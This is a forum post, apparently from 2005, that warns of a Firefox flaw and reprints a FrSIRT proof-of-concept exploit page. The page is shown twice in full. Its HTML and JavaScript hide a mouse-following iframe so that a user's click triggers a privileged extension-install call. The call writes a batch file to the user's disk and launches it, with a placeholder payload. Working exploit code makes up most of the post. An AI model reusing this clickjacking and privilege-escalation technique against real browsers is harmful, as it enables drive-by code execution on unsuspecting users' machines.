DarkMew
Dark Sith Lord
- 80
- Posts
- 20
- Years
- http://localhost
- Seen Apr 4, 2006
Watch out for this newly discovered Firefox vulnerability.
It is called "0day", the Mozilla people are working to fix it.
This is how it works:
When a user clicks inside a specially crafted web page, the browser
will make a malicious batch file and execute it.
Here is example code:
-----------0day_example.html-------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.
//
// Update (08.05.2005) - The Mozilla Foundation patched (partially) this
// issue on the server side by adding random letters and numbers to the
// install function, which will prevent this exploit from working.
<html><head><title>firefox 0day exploit</title>
<body>Click anywhere inside this page<br>
<br>Advisory - https://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:
{href:\'https://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install
(event,\'You are
vulnerable!!!\',\'javascript:eval
(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath
(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique
(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-
stream;1\\\\\\\'].
createInstance
(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious
commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write
(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\'
style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;
padding:0px;
-moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
---------------------------end-------------------------------------
This bug will probably be fixed soon.
It is called "0day", the Mozilla people are working to fix it.
This is how it works:
When a user clicks inside a specially crafted web page, the browser
will make a malicious batch file and execute it.
Here is example code:
-----------0day_example.html-------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.
//
// Update (08.05.2005) - The Mozilla Foundation patched (partially) this
// issue on the server side by adding random letters and numbers to the
// install function, which will prevent this exploit from working.
<html><head><title>firefox 0day exploit</title>
<body>Click anywhere inside this page<br>
<br>Advisory - https://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if
(window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:
{href:\'https://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install
(event,\'You are
vulnerable!!!\',\'javascript:eval
(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes
[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath
(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique
(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-
stream;1\\\\\\\'].
createInstance
(Components.interfaces.nsIFileOutputStream);outputStream.init
(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious
commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write
(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a
href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\'
style=\'cursor:default;\'> </'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"
marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;
padding:0px;
-moz-opacity:0"></iframe>
<script language="JavaScript" type="text/javascript">
document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}
var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
---------------------------end-------------------------------------
This bug will probably be fixed soon.